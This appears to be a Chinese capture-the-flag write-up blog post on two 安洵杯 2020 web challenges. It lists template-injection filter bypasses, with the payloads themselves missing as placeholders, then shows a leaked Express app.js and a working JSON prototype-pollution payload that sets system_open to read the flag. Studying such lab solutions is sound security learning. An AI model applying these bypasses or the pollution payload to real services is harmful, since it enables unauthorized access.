# [安洵杯 2020] Normal SSTI

# waf

.过滤
_过滤
<!--swig0-->过滤
[]过滤

# 解题

.过滤用attr绕过
_过滤用unicode编码绕过
<!--swig1-->过滤用<!--swig2-->进行回显
[]过滤用getitem代替

# payload

官方是用 lipsum

/test?url=<!--swig3-->
/test?url=<!--swig4-->

我这里用 os

(注意 read 后面要加一个括号)

url=<!--swig5-->
url=<!--swig6-->

image-20220117212409609

# [安洵杯 2020] Validator(源码泄露与原型链污染)

# 源码泄露

直接访问app.js即可

app.js

const express = require('express')
const express_static = require('express-static')
const fs = require('fs')
const path = require('path')
const app = express()
const port = 9000
app.use(express.json())
app.use(express.urlencoded({
    extended: true
}))
let info = []
const {
    body,
    validationResult
} = require('express-validator')
middlewares = [
    body('*').trim(),
    body('password').isLength({ min: 6 }),
]
app.use(middlewares)
readFile = function (filename) {
	var data = fs.readFileSync(filename)
	return data.toString()
}
app.post("/login", (req, res) => {
    console.log(req.body)
    const errors = validationResult(req);
    if (!errors.isEmpty()) {
        return res.status(400).json({ errors: errors.array() });
    }
    if (req.body.password == "D0g3_Yes!!!"){
        console.log(info.system_open)
        if (info.system_open == "yes"){
            const flag = readFile("/flag")
            return res.status(200).send(flag)
        }else{
            return res.status(400).send("The login is successful, but the system is under test and not open...")
        }
    }else{
        return res.status(400).send("Login Fail, Password Wrong!")
    }
})
app.get("/", (req, res) => {
    const login_html = readFile(path.join(__dirname, "login.html"))
    return res.status(200).send(login_html)
})
app.use(express_static("./"))
app.listen(port, () => {
    console.log(`server listening on ${port}`)
})

package.json

{
"name": "validator",
"version": "1.0.0",
"main": "app.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"keywords": [],
"author": "",
"license": "ISC",
"description": "",
"dependencies": {
"express": "^4.17.1",
"express-static": "^1.2.6",
"express-validator": "^6.6.0",
"fs": "0.0.1-security",
"lodash": "^4.17.16"
}
}

# 原型链污染

只需要password为D0g3_Yes!!!且info.system_open为yes即可

image-20220117215400856

构造

{"password":"D0g3_Yes!!!", "a": {"__proto__": {"system_open": "yes"}}}

提交时记得将传递参数类型修改为 json

image-20220117215523255

image-20220117215528913

请我喝[茶]~( ̄▽ ̄)~*

miku233 微信支付

微信支付

miku233 支付宝

支付宝

miku233 贝宝

贝宝